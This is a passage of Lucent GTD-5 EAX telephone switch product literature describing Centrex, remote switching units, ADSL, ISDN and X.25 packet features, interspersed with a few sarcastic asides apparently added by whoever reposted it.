business strategies and their customers' needs. Lucent Technologies' Rapid
Feature Delivery system implements new software features promptly and
efficiently.
APPLICATIONS
The technologically advanced switching portfolio provides circuit and packet
technologies arming service providers with the tools that will take them
into the future. The GTD-5 central office switch and its family of elements
are reliable circuit switch technologies that will be viable well into the
21st century. The iMerge Centrex Feature Gateway utilizes packet technologies
allowing service providers to differentiate their Centrex offering, increase
market reach, and generate new revenue streams.
GTD-5 EAX Central Office Switch is a multi-service, scalable, digital
communications switching system that can be configured to serve a wide range
of applications from a few hundred lines to 150,000 lines. The system
supports local and long distance voice and data traffic, Internet access, and
wireless and multimedia service. Its modular architecture, low operating costs
and high reliability make it an excellent choice for service providers.
XLMF High Density Line Frame Provides a High-Density Line Frame solution for
growing floor space concerns. This offering supports up to 3584 subscribers
and provides a minimum of 4:1 savings in floor space as compared to current
offerings. Up to a 7:1 savings when replacing queen size line frames. The
XLMF connects fiber-optically to the host TCU, which can be up to 2,000'away.
Remote XLMF High Density Line Frame is a DS3 transport, satellite system
hosted by the GTD-5 base unit. This solution allows the XLMF to be positioned
in a remote location serviced by a DS3 transport network. The RXLMF supports
up to 3584 subscribers and provides a minimum of 4:1 savings in floor space as
compared to current RSU offerings. Up to a 7:1 savings when replacing RSU Queen
size line frames.
Peripheral High Speed interface expands the capabilities of the GTD-5 by
equipping it with a high-speed interface. A proprietary optical interface
makes it possible for the GTD-5 to communicate with far-end devices,
including adjunct or remote equipment designed by Lucent Technologies, or
other vendors. The PHSI offers an economical means of accessing and
transporting the equivalent of four Facility Interface Units (FIU) or
GTD-5 voice/data time slots (768) on a fiber interface. Implementation
requires the installation of a pair of PHSI cards within the existing Time
Switch and Peripheral Control Unit (TCU) module. Accessed equipment must
be connected to the PHSI with a maximum of 2,000 feet of fiber. All
administration is accomplished with the GTD-5 Operations Gateway over an
Ethernet LAN. Applications supported include several that take advantage of
the GTD-5 's versatility and dependability, such as interfacing to the
Lucent Multiplex Access Interface Unit (XLMF), and servicing end-user
connection devices with voice-frequency telephony service. The PHSI also
supports inter-office Class 5 trunking that carries signaling information via
SS7.
Operations Gateway (OG) enhances maintenance and operations for the GTD-5
and its new feature elements. The OG administers the entire GTD-5 system and
all its network elements. OG manages DS3 interface, XLMF, RXLMF, CALEA,
internal high-speed LAN, GTD-5 system documentation via CD-ROM (replaces the
documentation PC), and system backup/restore via tape drive emulation. There
is a removable flash disk for hard media storage and GTD-5 system, recent
change and TDA logging for problem resolution. A high-speed TCP/IP
connection is recommended for maintenance and RFD support and is facilitated
by the OG. CALEA functionality allows it to comply with Federal
Communications Commission (FCC) mandates for monitoring circuit switched
calls. CALEA (the Communication Assistance for Law enforcement Act) requires
telephone companies to provide electronic surveillance capabilities to
authorized law enforcement agencies. As of June 30,2000, all wireline and
wireless carriers must meet "minimum intercept requirements" for providing
call identification information and communications content. SVR 4004 enables
the GTD-5 to support multiple levels of Surveillance.
*ACK!* Big Brother's watching over us...
Remote Switching Unit (RSU) is a satellite switching system hosted by the
GTD-5 base unit. The smaller RSU is ideal for offering the same voice, video
and data services as the GTD-5 in rural or campus locations. The RSU can
provide service for more than 6,000 lines. Typical start-up size is between
250 and 1,500 lines.
Remote Line Unit (RLU) is a pair-gain switching system that can serve 1,536
lines. Hosted by either a GTD-5 base unit or RSU, the system offers the same
services as the GTD-5. The system is perfect for relieving network congestion
in high-demand metropolitan areas or for offering communications services in
rural areas. Typical start-up size is between 100 and 400 lines.
Multiplexer Unit (MXU) is a small pair-gain switching system designed to
serve small population clusters like apartment complexes, shopping centers or
new subdivisions. The MXU has a capacity of 96 lines.
market reach, and generate new revenue streams.
GTD-5 EAX - VALUE TO THE CUSTOMER/ESLUT
Feature-Rich - The GTD-5 architecture is designed to industry standards. Its
open interfaces accommodate evolving networks, allowing Telus to implement new
technology quickly and practically. Features include: Advanced Intelligent
Network (AIN) services, ADSL, ISDN, ADSI, EBAF, VMS, CLASS, SS7, Centrex,
64 Kbps clear channel and TR303.
Award-Winning Quality - Recognized as one of the industry's most reliable
switches, the GTD-5 has won numerous awards, including five "Best in Class"
awards from GTE (Verizon). Independent industry studies consistently rank
the GTD-5 as having some of the lowest incident-outage rates among all
central office switches. But we're working on that.
Evolving with the Future - The communications landscape is radically
changing. The growth of the Internet and managed data networks is
challenging Telus to re-evaluate their network strategies as data begins to
dominate the public network. Lucent Technologies helps Telus protect their
current network investment and gain a competitive edge while evolving into
the data-centric world. The GTD-5 is evolving to a packet solution.
Competitive features on both switch types will ensure the smooth migration
from circuit to packet switching. What that means for Telus is less network
congestion, reduced network complexity and the ability to introduce new
moneymaking services and target new markets. Also known as a new way to
screw us outta cash...
GTD-5 EAX - NETWORK ELEMENTS
Lucent's portfolio of switching network Elements offers service providers
evolutionary hardware, software and network management systems to provide
their business and residential customers with the latest technologies
utilizing voice, video, and data solutions.
Remote Line Unit (RLU) is a pair-gain switching system that can serve 1,536
lines. Hosted by either a GTD-5 base unit or RSU, the system offers the same
services as the GTD-5. The system is perfect for relieving network congestion
in high-demand metropolitan areas or for offering communications services in
rural areas. Typical start-up size is between 100 and 400 lines.
Multiplexer Unit (MXU) is a small pair-gain switching system designed to
serve small population clusters like apartment complexes, shopping centers
or new subdivisions. The MXU has a capacity of 96 lines.
Flexible Architecture
The GTD-5's duplex architecture and modular design gives service providers
the ability to add features and customize services according to their
business strategies and their customers' needs. Lucent Technologies' Rapid
Feature Delivery system implements new software features promptly and
efficiently.
CENTREX
Setting the standard for state-of-the-art Centrex, Lucent's GTD-5 EAX
Central Office Exchange (Centrex) gives Telus the ability to
build lasting relationships with their business customers by providing
and managing the full spectrum of communications services they need to
be successful.
* Complete and customizable feature set
* Digital clarity and access
* Flexible design permits business groups and private dialing plans
* Open interfaces allow quick implementation of new features
* Sophisticated call-handling and features available from any phone
Service Provider Benefits
* Generate incremental revenues from a variety of services
* Increase market share and loyalty by introducing new services quickly
* Increase customer loyalty with top-notch account management capabilities
* Reduce network costs by serving several customers from a centralized platform
* Raise awareness and build brand identity with differentiated business
offerings
Subscriber Benefits
Centrex service allows Telus to partner with their business customers by
managing and maintaining their communications systems, relieving them of the
substantial capital investment required to purchase customer premises
equipment (CPE). Centrex allows organizations to invest in building their
business rather than in owning and maintaining a telephone system. The
service frees businesses to dedicate valuable staff resources to core
business activities and protects them from the costs associated with
equipment obsolescence. Unlike PBX systems, subscribers pay only for
the number of lines and features that they use. Further cost efficiencies
are achieved by eliminating the expense of insuring equipment, lowering
power consumption and reducing space requirements.
Subscriber Value Propositions
* Minimize capital expenditures on CPE purchase and upgrades
* Reduce operating expenses on CPE staff, maintenance, insurance and power,
etc.
* Acquire the latest communications technologies immediately
* Customize system by increasing or decreasing leased lines and features
according to business demands
* Improve operations with the unsurpassed reliability of a CO-based system
* Increase productivity by extending headquarters telecommunications
features to branch offices, telecommuters and road warriors
* Simplify telecommunications administration with common dialing plans
across the organization
Flexible Architecture
GTD-5 Centrex's flexible architecture accommodates both simple and advanced
telecommunications applications, easily adapting to meet the changing needs
of service providers and subscribers. The open interfaces of the GTD-5
architecture and its modular design accommodate evolving networks, allowing
service providers to quickly implement new technologies. Service providers
can add features and customize services promptly and efficiently according
to their business strategies and the needs of their customers.
The architectural design also enables service providers to create business
groups and private dialing plans that span multiple GTD-5 switches. Optional
enhancements include integration with virtual private facilities and
inclusion of Integrated Services Digital Network (ISDN).
Advanced Customizable Features
GTD-5 Centrex delivers a sophisticated array of call-handling features and
options comparable to state-of-the-art, on-premise equipment. Unlike CPE
systems, all functions are accessible from any telephone. The functions can
be customized to the specific needs of each telephone user in the business
group, and easily modified as those needs change.
Popular Analog Centrex Features
* Extension intragroup dialing
* Conference calling
* Call transfer
* Attendant services
* Voice messaging
* Portable terminals
* Multi-location business groups
* Automatic callback/recall
* Executive busy override
* Automatic route selection
Digital Centrex Features
* Access to analog Centrex features
* CLASS features including automatic callback, customer-originated trace and
selective call acceptance or rejection
* Flexible calling features including call hold/drop/retrieve, conference
calling and call transfer, call waiting, call forwarding and call pickup
* Display services like calling number, name displays and display blocking
* Customizable terminal services like visual message waiting indicator,
remote access to voice mail, intercom calling, abbreviated and delayed
ringing and privacy functions
* Multiple and shared call appearances
* Multiple directory numbers
* One-touch feature button access
* High-speed data transfer
* Unified messaging
* NI3 CPE support
REMOTE SWITCHING UNIT
The GTD-5 Remote Switching Unit (RSU) offers you the same modular design as
your GTD-5 central office switch and the latest in digital network-based
services to local and rural communities.
A GTD-5 RSU is a small, intermediate size remote digital switching system
capable of switching line-to-line, line-to-trunk, trunk-to-line and
trunk-to-trunk calls. It is designed to serve outlying communities and large
metropolitan areas requiring cable relief. The RSU also provides switching
of local calls and links back to the central office switch for all other
calls.
The Remote Switching Unit Provides:
Efficiency
* Offers the benefits of your GTD-5 to smaller communities up to 600 miles
from the host GTD-5
* Delivers business features when and where you need them
Versatility
* Permits replacement or consolidation of small central offices
* Permits temporary replacement during rebuilding or dedicated advanced
business services to a large Centrex customer
Scalability
* Easily accommodates modular line growth, host to integrated remote
pair-gain devices, RSU trunking and co-location of RSUs
Economy
* Commonality of hardware and centralized maintenance from the host GTD-5
means lower maintenance costs and less training
Remote Switching Unit Features and Functions
Flexible Digital Design
* Designed for unattended operation
* 32 RSUs can be served from a single GTD-5 via Host-Remote (H-R) Links
* Engineered to meet each location's traffic needs
* Serves as the host to integrated pair-gain devices
Ideal for Remote CO Applications
* Ideal for small central office applications
* Uses direct trunking from RSU to other central offices, PABXs or local 911
services
* Offers the same flexibility and advanced business services as the host GTD-5
Survivability
* Survivability mode assures minimal service interruption
* Line-to-line survivability DP/DTMF receiving:
o Revertive calling
o Multi-line hunt groups
o Recorded announcements
o Traffic and performance data
* Recovery software
* Trunking survivability:
o DP/MF sending and receiving
o PABX trunking
o Local 911 trunking
* Business survivability:
o DID/DOD
o Abbreviated dialing
o Hold/Add-On Conferencing/Transfer
o 9+ and tie trunk access codes
Architectural Design
* Commonality of features, services, digital technology, hardware with host
GTD-5
* Two separate control channels to host
* Bit-parallel, time-space-time, n x 64 kbps switching fabric for intra-RSU
calls
* Variable-line concentration identical to host (4:1, 6:1, 8:1)
* A GTD-5 base unit supports up to 32 RSUs
Specifications
* 6,144 line terminations
* 768 trunk and receiver terminations
* 6.73 fully loaded CCS/line
* 28.8 fully loaded CCS/trunk
* 32 RSUs homing on GTD-5
* 2-32 H-R Links per RSU
* 2 Remote Line Units (RLU) homing on RSU:
o 1,536 RLU line terminations
o 2-8 H-R Links per RLU
* 8 Multiplexer Units (MXU/SLC5 FPI) homing on RSU:
o 96 MXU line terminations
o 1-4 H-R Links per MXU
* 40,000 directory numbers
* 2 home numbering plan areas
* 4 office codes
* 2 alternate routes
HIGH SPEED ACCESS
As voice, video and data networks converge, service providers will need to
optimize their access infrastructure to meet consumers' demand for increased
bandwidth. Lucent Technologies offers a state-of-the-art suite of access
solutions that enables service providers to get their networks up to speed.
Our end-to-end solutions, from ISDN and ADSL to IP gateways, provide business
and residential customers with cutting-edge services today from custom
telephony to digital data to video-on -demand.
ASYMMETRIC DIGITAL SUBSCRIBER LINE
Asymmetric Digital Subscriber Line (ADSL) provides a high-speed end-to-end
broadband data path using ADSL technology over existing subscriber facilities
in the public switched network. ADSL provides a 1.66-Mbps downstream path to
the end user and a 72-Kbps return path while maintaining POTS service over
the same single twisted pair phone line.
Integrated ADSL is available in GTD-5 SVR 1732 and later releases.
Non-integrated ADSL is available in all commercially available GTD-5 SVRs
INTEGRATED CIRCUIT-SWITCHED DATA
Part Number: N/A
Integrated Circuit-Switched Data (CSD) provides the subscriber with digital
data transmission and digital voice transmission over a standard telephone
line. A Data Adapter (DA) is used to integrate data and provide digital
access origination and termination controls to the switch. The DA is located
near the subscriber's telephone and terminal or computer. The DA serves as an
interface between the subscriber's telephone and terminal or computer and the
subscriber's line that is interconnected to the GTD-5 EAX. Integrated CSD
provides a means to switch DA asynchronous data up to 19.2 kbps or synchronous
data up to 64 kbps between the DA and another DA, or any other compatible CSD
device.
Following are brief descriptions of CSD characteristics, sub features, and
field descriptions.
* Digital Subscriber Line Connection
A digital data line connection through a DA can support both digital data and
voice call transmission.
* Digital Hunt Group Connection
CSD allows several DAs to form a hunt group connection that is able to
support both digital data and voice call transmission.
* Circuit-Switched Data Fields
The following data fields are engineered to inform the GTD-5 EAX of the
proper response to various conditions associated with CSD.
o Character Length. This field specifies if a digital data line or digital
data hunt group can transmit a character length of 5, 6, 7, or 8 bits.
o Digital Data Transmission Rate. This field specifies which of 16 available
bits-per-second (bps) transmission rates are allowed for a digital data line
or digital data hunt group member.
NOTE: The bps values must be identical between two devices for them to
interface.
o Duplex. This field indicates if a digital data or modem hunt group can
transmit data in the full duplex mode (data is both sent and received
simultaneously) or half duplex mode (data can be both sent and received, but
not simultaneously).
o Number of Stop-Bits. This field specifies if digital data hunt group
members can transmit one, one and one-half, or two stop-bits. Stop-bits
signify the end of an asynchronous data character string. This field does
not apply to synchronous data.
o Synchronous or Asynchronous Transmission. This field specifies if
asynchronous or synchronous data is transmitted over a digital data line or
digital data hunt group.
Available in GTD-5 SVR 1633 and later releases.
For additional feature availability information, contact your Lucent
representative.
For technical specifications see the GTD-5 CD ROM.
ISDN PRIMARY RATE ACCESS
Part Number: SP-16173-PRIT
Class II Equipment with Primary Rate Interface (PRI) allows for an exchange
of signals occurring beyond the Stored Program Controlled Switching (SPCS)
system's point of contact with the interface (that is, between the equipment
directly connected to the SPCS and the ISDN terminals or telephones connected
to the equipment). A common example of Class II Equipment is an ISDN-compatible
Private Branch Exchange (PBX) serving Class Equipment ISDN terminals using a
Basic Rate Interface (BRI) or serving telephones.
The GTD-5 EAX Primary Rate Access (PRA) consists of three standard ISDN PRA
layers:
1. Clear Channel Capability (CCC)/Extended Superframe (ESF) format (layer 1)
2. Link Access Procedures on the D-channel (LAPD)/Q.921 (layer 2)
3. Q.931 signaling protocol (layer 3), which also supports the following PRA
supplementary features
o Switched Fractional DS1 Services (nxDS0)
o Call-by-Call Services
o Calling Line Identification (CLID) Services
o User-to-User Signaling
o Two B-Channel Transfer
o Skip Calling Number Screening
For full support of the PRA capability to the network, the GTD-5 EAX provides
SS7 ISDN User Part (ISUP) to PRA (Q.931) interworking, as well as SS7 ISUP
intraLATA and interLATA signaling.
Switched Fractional DS1 Service
This feature provides support of the Switched DS1/Switched Fractional DS1
Service capability over a Primary Rate Interface (SWF-DS1/ISDN). SWF-DS1/ISDN
supports wideband Unrestricted Digital Information (UDI) bearer capabilities
at rates greater than 64 kbps and less than or equal to 1536 kbps. A more
common name for SWF-DS1/ISDN is "nxDS0." The EDT-FIU feature provides the
GTD-5 EAX with a 64-kbps clear channel capability that is a basic requirement
for a switch to handle nxDS0 calls.
The GTD-5 EAX supports the ISDN PRA access interface and the SS7 ISUP
interoffice interface but not the non-ISDN access switched fractional
interface. Outgoing calls to SWF-DS1/non-ISDN called parties can be switched
by the GTD-5 EAX only to SS7 trunk circuits. Similarly, incoming SWF-DS1/non-
ISDN calls can only be received over SS7 trunk circuits. By subscribing to
SWF-DS1/ISDN service on the GTD-5 EAX, the user can make and receive
SWF-DS1/ISDN calls at the selected rate with another SWF-DS1/ISDN user
(via PRI or SS7) or with an SWF-DS1/non-ISDN user accessed via SS7.
In typical public ISDN network offerings, switched access for customers is
restricted to services using bit rates of less than or equal to 64 kbps.
SWF-DS1/ISDN is a capability for supporting nx64 kbps (where 2 <= n <= 24)
services on a real-time switched basis that normally can only be supported
by private line service offerings. Videoconferencing is a prime application
for SWF-DS1/ISDN. Point-to-point multi-media applications give customers the
ability to integrate different kinds of media, such as combinations of video,
images, audio, and data, on a single access pipe.
PRA Call-by-Call Service Selection provides services to a PRI as an
alternative to providing a separate PRI interface for each service by
combining all services on the same PRI trunk group. A Call-by-Call service
can be requested by including an indication of the requested service in the
call request, or by selecting a set of B-channels that are dedicated to the
service. When no indication is received, the call is treated as a public
network call. In addition, the GTD-5 EAX uses ISDN Call Type (voice or data)
as criteria to select an outgoing PRI trunk group.
Simulated Facility Groups (SFGs) are provided on a PRI to limit the number
of simultaneous calls for a Call-by-Call Service.
PRA Calling Line Identification (CLID) extends PRI requirements for circuit
switched basic call control to services involving provision and delivery of
Calling Party Numbers (CPN) and Calling Party Name (CNAM) using interoffice
Signaling System No. 7 (SS7) transport. SS7 messages pass CPN and Redirecting
Number (RN) data between the originating and terminating switches. The PRA
CLID feature handles CPN, Calling Party Subaddress (CPS), RN, and
Redirecting Subaddress (RS) processing for circuit-mode calls and provides
four component features:
1. Number Provision (for CPNs and RNs)
2. Number Screening (for CPNs and RNs)
3. Number Privacy (for CPNs and RNs)
4. Number Delivery (for CPNs and RNs)
PRA User-to-User Signaling (UUS) allows user equipment to exchange user
information in the call request phase, call confirmation phase, and call
clearing phase of a PRA call. UUS provides for the transport of User-to-User
Information (UUI) over the PRA and includes interworking between PRA and SS7
signaling. UUS also supports wideband calls.
Two B-Channel Transfer (TBCT) allows the user on a PRI to request the GTD-5
EAX to connect two independent calls on the user's interface. If the request
is accepted, the controller is released from the calls and the other two
users are directly connected. This feature is available in GTD-5 SVR 1731.
Skip Calling Number Screening
Skip Calling Number Screening causes the GTD-5 EAX to use an unscreened
Calling Party Number (CPN) or Redirecting Number (RN) as the billing number
for a call, and store the user-provided CPN (if available) into the call
register as "passed screening."
Additional ISDN PRI features include:
Custom Primary Rate Interface Enhancement, Feature Package A
This feature provides a custom PRI interface for the GTD-5 EAX based on the
custom PRI provided by Lucent Technologies on the 5ESS(r). It allows the
GTD-5 EAX to initialize, originate calls, and terminate calls on a PRI
interface that conforms to the custom PRI implementation on the 5ESS. This
feature is available in GTD-5 SVR 4000.
Multiple PRI Traffic Distribution
Internet Service Providers (ISPs) are turning up service by purchasing
multiple single span primary rate interfaces (PRIs). The Multiple PRI
Traffic Distribution feature allows telephone companies to engineer a PRI
trunk group to have more than one PRI and thus distribute traffic over
multiple PRIs. Each PRI is controlled by a separate D-Channel (or pair of
D-Channels) that controls the trunk group channels. This feature is
available in GTD-5 SVR 1732.
Frame Relay Access provides a PRI interface to frame handlers (FH) connected
to the GTD-5 via another PRI. Frame relay signaling over the B-Channel(s)
between the customer's equipment (CPE) and the FH is transparent to the
GTD-5 EAX.
Multipoint Video/Data Conferencing provides a PRI interface to a Multipoint
Control Unit (MCU). The MCU supports Meet-Me, Add-On, and Preset Multi-media
conferences to PRI and Switched 56 trunks.
PRI 10-Digit Local Dialing allows for local calls over a PRI interface to be
completed whether 7-digits or 10-digits are provided for the called number.
This feature is available in GTD-5 SVR 4000.
PRI Abbreviated Dialing
This feature allows a GTD-5 ISDN Switching Module (ISM) or Private Branch
Exchange (PBX) to provide intercom digits (for example, 4 or 5 digits) to
the GTD-5 over a PRI interface. The GTD-5 will complete the call just as if
a GTD-5 business group line had placed the call. The GTD-5 can also send
intercom digits to the ISM or PBX for completion of intercom calls from the
GTD-5. Proper intra-business group alerting is applied to the intercom
calls. This feature is available in GTD-5 SVR 4001.
Available in GTD-5 SVR 1721 and later releases. (Unless otherwise stated
above)
For additional feature availability information, contact your Lucent
representative.
For technical specifications see the GTD-5 CD ROM.
SUPPRESSED RINGING
Part Number: N/A
The suppressed ringing feature allows a specially classmarked originator to
access a subscriber line without ringing it.
This capability allows data communication between a central controller and
responder equipment at the customer premises without disturbing the subscriber.
Typical applications are:
* Remote reading of utility meters
* Cable TV pay-per-view activation
* Analog Display Services Interface (ADSI) activation and updates
Available in GTD-5 SVR 4001 and later releases.
For additional feature availability information, contact your Lucent
representative.
For technical specifications see the GTD-5 CD ROM.
HIGH SPEED ACCESS - ISDN BRI OVERVIEW
Lucent's ISDN service on the GTD-5 gives your customers the features,
flexibility and bandwidth they need to get in the fast lane on the information
superhighway.
ISDN service on the GTD-5 gives your customers the flexibility to talk,
receive and send data, and transmit images, video or faxes, all on the same
line, at the same time.
* ISDN Centrex features accommodate multiple devices and multiple phone
numbers on a single line, which allows your customers to offer many of the
professional sales and support services traditionally associated with much
larger companies without the expense of installing large customer premises
equipment like PBXs.
* Data transmission speeds twice as fast as a 56 kbps modem.
* Cleaner, reliable and more secure data and voice delivery on an end-to-end
digital connection.
* Compatibility with traditional telephone service, including major long
distance carriers like AT&T, MCIWorldcom and Sprint, allows customers
to make and receive calls from people who subscribe to traditional telephone
service.
* Host of custom calling services like caller ID, call forwarding and
conferencing.
ISDN BRI Feature Capabilities*
* Two users share one line
* Multiple communication devices on one line
* Directory number share over multiple call types on an integrated terminal
* Two simultaneous voice calls on different B-Channels
* Retrieve or setup calls on idle B-channel
* Conference call, retrieve on idle B-channel
* Electronic Key Telephone Systems
* Call forwarding
* Call hold
* 3-, 8-, 16- and 24-way conference calling
* Calling number identification
* Display services
* Automatic callback (Intraswitch)
* Message service
* Multiline hunt group
* Basic business group
* Call pickup
* Attendant access
* Station message detail recording
* Analog features
* Calling name identification
* 911
* Music on hold
* Remote access to call forwarding
* Dual PIC
* D-channel packet mode call control
*This list is not a comprehensive catalog of ISDN BRI features on the GTD-5.
GTD-5 Popular APPLICATIONS
ISDN Centrex is an affordable solution designed to meet your business
customers' communication needs with a telco-maintained, feature-rich offering.
Give your small-business customers the look of a much larger company, or
enhance and streamline communications of your customers' 1000-plus-line
corporation - all without the capital expense of costly PBX and key systems.
High-Speed Internet Access allows your customers to connect to the Internet
at 128 kbps or twice as fast as a conventional connection. Further, GTD-5
ISDN service enables your customers to maximize the Internet's full range of
multimedia capability.
Home Office or Telecommuting is made easy through a reliable high-speed link
to the office and business world. Customers can transfer files in an
instant, access the Internet or office LAN/WAN, share documents, utilize the
phone and fax and send e-mail from a single digital connection, all at the
same time.
Desktop Videoconferencing allows your customers to not only save the time
and expense of travel through real-time desktop videoconferencing, but also
makes meetings more productive by enabling customers to share computer files
and other resources. Of course, your customers could use this capability
just to keep up with grandchildren.
Image Transfer relieves customers of deadline pressure by delivering large
graphics files like medical images or advertising materials in minutes.
Files can be edited and reviewed immediately, making for much more efficient
project management than is available through traditional overnight courier
services.
High-Quality Audio Broadcast ISDN allows customers to transmit CD-quality
digital audio or radio broadcasts to remote locations or Internet sites.
Point-of-Sale Transactions. High-speed, simultaneous voice and data
connectivity that is secure and instantaneous makes ISDN ideal for customer
point-of-sale transactions like credit card verification.
ISDN HARDWARE - BASIC RATE INTERFACE LINES
Part Number: SP-14000-RDT3 (for RDT BRI lines), SP-14000-RDT4 (for RDT BRI
lines) BRI-type Digital Subscriber Lines (DSLs) are provisionable directly
on a GTD-5 EAX Basic Rate Line Peripheral Interface Unit (BLU) or off of a
TR-303 RDT.
Available in GTD-5 SVR 4000 and later releases.
ISDN BRI CUSTOMER PREMISES EQUIPMENT
Vendor-specific proprietary equipment limits the ability to provide
features and services to customers. GTD-5 ISDN BRI resolves this
problem by providing an "open interface" that allow the customers
to connect industry standard BRI CPE to their GTD-5 BRI digital subscriber
lines. There are many advantages to using industry standard BRI CPE
including standard interface, numerous BRI CPE vendors to choose from,
integrated voice and data, PC "Plug and Play" capable, and higher speed data
connections.
GTD-5 EAX Features
BRI PACKET SERVICES
Part Number: N/A
This feature provides D-channel packet data services for BRI subscribers.
The GTD-5 EAX provides X.25 packet services on a BRI D-channel. The following
sub features are supported:
* Multiplexed Packet Data on the D-channel. D-channel packet calls are
originated by the ISDN terminal using only X.25 call control messages.
Terminating D-channel packet calls may or may not require the use of Q.931
call control procedures to establish a logical channel between the GTD-5 EAX
and the ISDN terminal, depending on the notification method subscribed and
the existence of active D-channel packet calls.
* Delivery of Packet-Mode Calls with No Notification. This feature is supported
for an ISDN terminal using the D-channel if the D-channel Packet Link is
currently active for the terminal.
* Delivery of Packet-Mode Calls with Conditional Notification. This feature
is supported for an ISDN terminal using the D-channel if the D-channel
Packet Link is currently inactive for the terminal.
* X.25 Reverse Charging. This feature is supported in the reverse charge
facility received in an X.25 Call Request packet. Incoming calls from the
X.75' network with the reverse charge facility terminate to the called X.25
facility if the called DN is subscribed to the Reverse Charging Acceptance.
X.75' Packet-mode calls received with the Reverse Charging facility and the
called DN not subscribed to the Reverse Charging Acceptance are cleared.
* Interexchange Carrier (IC) Preselection for Packet-Mode Calls. This
feature is included in the X.75' Call Request sent to the external Packet
Switch when a Recognized Private Operating Agency (RPOA) facility is not
included in the X.25 Call Request message received from the BRI subscriber
and the GTD-5 EAX is unable to discriminate between inter- and intra-network
numbering (as defined by the NDID/Data Interchange Standard Association,
Inc. (DISA) parameters).
* RPOA Selection facility. This feature is used by an X.25 user to request
the use of an IC different from the one pre-subscribed for the DN. When
present in the X.25 Call Request packet, the RPOA Selection facility is passed
transparently across the X.75' link to the Packet Switch for routing to the
designated IC.
* CCITT X.25 services. The GTD-5 EAX passes to the external packet switch
the following CCITT X.25 services received in an X.25 packet:
o Calling Address Extension. This facility contains additional information
identifying the calling packet user.
o Called Address Extension. This facility contains additional information
identifying the called packet user.
o Minimum Throughput Class. This facility reflects the lowest packet throughput
class that is acceptable to the sending Data Terminal Equipment (DTE). The
facility is also used during throughput negotiation when the requested
throughput cannot be provided.
o End-to-end Transit Delay. This facility contains the values of measured,
expected, and maximum allowable transit delay for the packet call. This
facility provides for future support of DTE services that might include
refusing a call or reporting when the transit delay is not acceptable to the
DTE.
o Expedited Data Negotiation. This facility provides an end-to-end indication
whether expedited data negotiation is to be used. No service for the use of
this facility has been defined at this time.
* Packet Routing and Digit Analysis. The GTD-5 EAX does not perform the
packet routing digit analysis for originating packet-mode calls. The GTD-5
EAX does screening and validation only, not packet routing. Originating
calls are connected to an external packet switch using X.75' trunks. The
calling party number included in the X.75' trunk provided for a packet-mode
call is the E.164 Directory Number identifying the GTD-5 EAX packet user.
The Called Party Number can be in the X.121 or E.164 numbering plans.
* In-Band Calling Number ID for Packet. X.25 Calling Number information may
be included in the X.25 Call Request packet by the calling DTE. The GTD-5
EAX screens calls based on the calling party number in the X.25 Call Request
in the same manner used for calling numbers received in a Q.931 SETUP
message. If the DN passes screening, the call proceeds with the provided DN.
If the DN fails screening, a default packet-mode Calling Number is used in
the Call Request packet for delivery to the called party.
* Fast Select. This feature provides for transferring up to 128 octets of
user data during the setup, confirmation, and clearing phases of a BRI
packet-mode call when using Unrestricted Fast Select, and the setup and
clearing phases when using Restricted Fast Select, if the called party is
subscribed to Fast Select Acceptance.
* One-Way Logical Channels. By default, an ISDN user may use logical channels
for incoming or outgoing calls. The GTD-5 EAX also allows an ISDN user to
specify that logical channels for packet data be one-way originating or
one-way terminating.
* Incoming/Outgoing Calls Barred. The GTD-5 EAX allows an ISDN user to specify
that incoming or outgoing packet mode calls are not allowed.
* Non-Default Packet and Window Sizes. Values for the packet and window sizes
for a given DN can be set to values other than the standard defaults
(128 octet packet size and a window size of two) under administration control.
Packet sizes of 128 and 256 octets and window sizes of 1-7 (modulo 8) are
supported. The packet and window sizes may be different for each direction of
transmission. Note the setting of the non-standard defaults to values other
than a packet size of 128 octets and a window size of two requires the DN be
subscribed to Flow Control Negotiation (FCN).
* Flow Control Parameter Negotiation. The GTD-5 EAX allows the calling and
called subscribers of a packet mode virtual call to negotiate the packet size
and window size for the call using the X.25 Call Request and Call Acceptance
messages. Negotiation allows different values in each direction of data
transfer. The GTD-5 EAX allows the use of any supported window size and a
packet size up to the maximum subscribed by the calling and called parties.
* Throughput Class Negotiation. This feature allows the calling party,
called party, and network to negotiate the throughput class for each direction
of a packet mode virtual call. If a default value is not subscribed for the
calling DN and D-channel type, an office default value of 9.6 kb/s is used.
The GTD-5 EAX serving the calling party indicates that a throughput class
lower than that requested or subscribed be used for a virtual call if the
use of the requested/subscribed throughput class causes the calling interface
to exceed its maximum allowed throughput.
The GTD-5 EAX serving a called party or the called party terminal can specify
a throughput class lower than that requested by the calling party. A lower
throughput class must be used if the requested throughput class is not
supported by the calling party or if the use of the requested throughput
class causes the called party to exceed its maximum allowed throughput for
the interface.
* Transit Delay. The GTD-5 EAX accepts X.25 Transit Delay parameters provided
by an ISDN CPE.
* User Testing. To facilitate user testing, the GTD-5 EAX allows an ISDN CPE
to place a packet-mode call using virtual facilities back to the same DN even
if the calling DN is subscribed to Incoming Calls Barred.
* Transit Network Identification. The GTD-5 EAX does not function as a transit
network switch, so it is required to generate a Transit Network Identification
Code (TNIC) as either an originating or terminating packet node. The GTD-5 EAX
supports transport of a TNIC received in an incoming X.75' Call Connected packet
or Clear Request packet if the Clear Request is the first response to the Call
Request.
* Call Identifier. The GTD-5 EAX serving an originating access packet user
inserts a Call Identifier Utility into the outgoing X.75' Call Request packet.
The Call Identifier Utility contains information concerning the identity of the
calling ISDN user. The GTD-5 EAX serving a terminating packet user supports a
receiving Call Identifier Utility in the X.75' Call Request packet.
* Clearing Network Identification. The GTD-5 EAX supports the sending of the
Clearing Network Identification Utility in an X.75' Clear Request packet when
the call is prematurely cleared (that is, cleared without an X.25 Clear Request
packet received from either the calling or called interface). The Stored Program
Controlled Switch (SPCS) initiating the call clearing inserts the Clearing
Network Identification Utility into the Clear Request, and the SPCS receiving
the Clearing Network Identification Utility records the contents of the utility
into maintenance reports associated with the call.
* Clearing Subnetwork Identification. The GTD-5 EAX supports the sending of
the Clearing Subnetwork Identification (CSI) Utility in an X.75' Clear
Request packet when the call is prematurely cleared during the call setup or
data transfer phases. That is, the call is cleared without an X.25 Clear
Request packet received from either the calling or called interface. The SPCS
initiating the call clearing inserts the Clearing Subnetwork Identification
Utility into the Clear Request, and the SPCS receiving the Clearing Subnetwork
Identification Utility records the contents of the utility into the CSI
syndromes.
* Transit Subnetwork Count. The GTD-5 EAX is capable of receiving an
incoming X.75' Call request packet containing a Transmit Subnetwork Count
Utility. The GTD-5 EAX inserts the Transit Subnetwork Count Utility in an
outgoing X.75' Call Request packet with initial value of zero.
* Closed User Groups (CUGs). A CUG can be created with the SET CUGP command
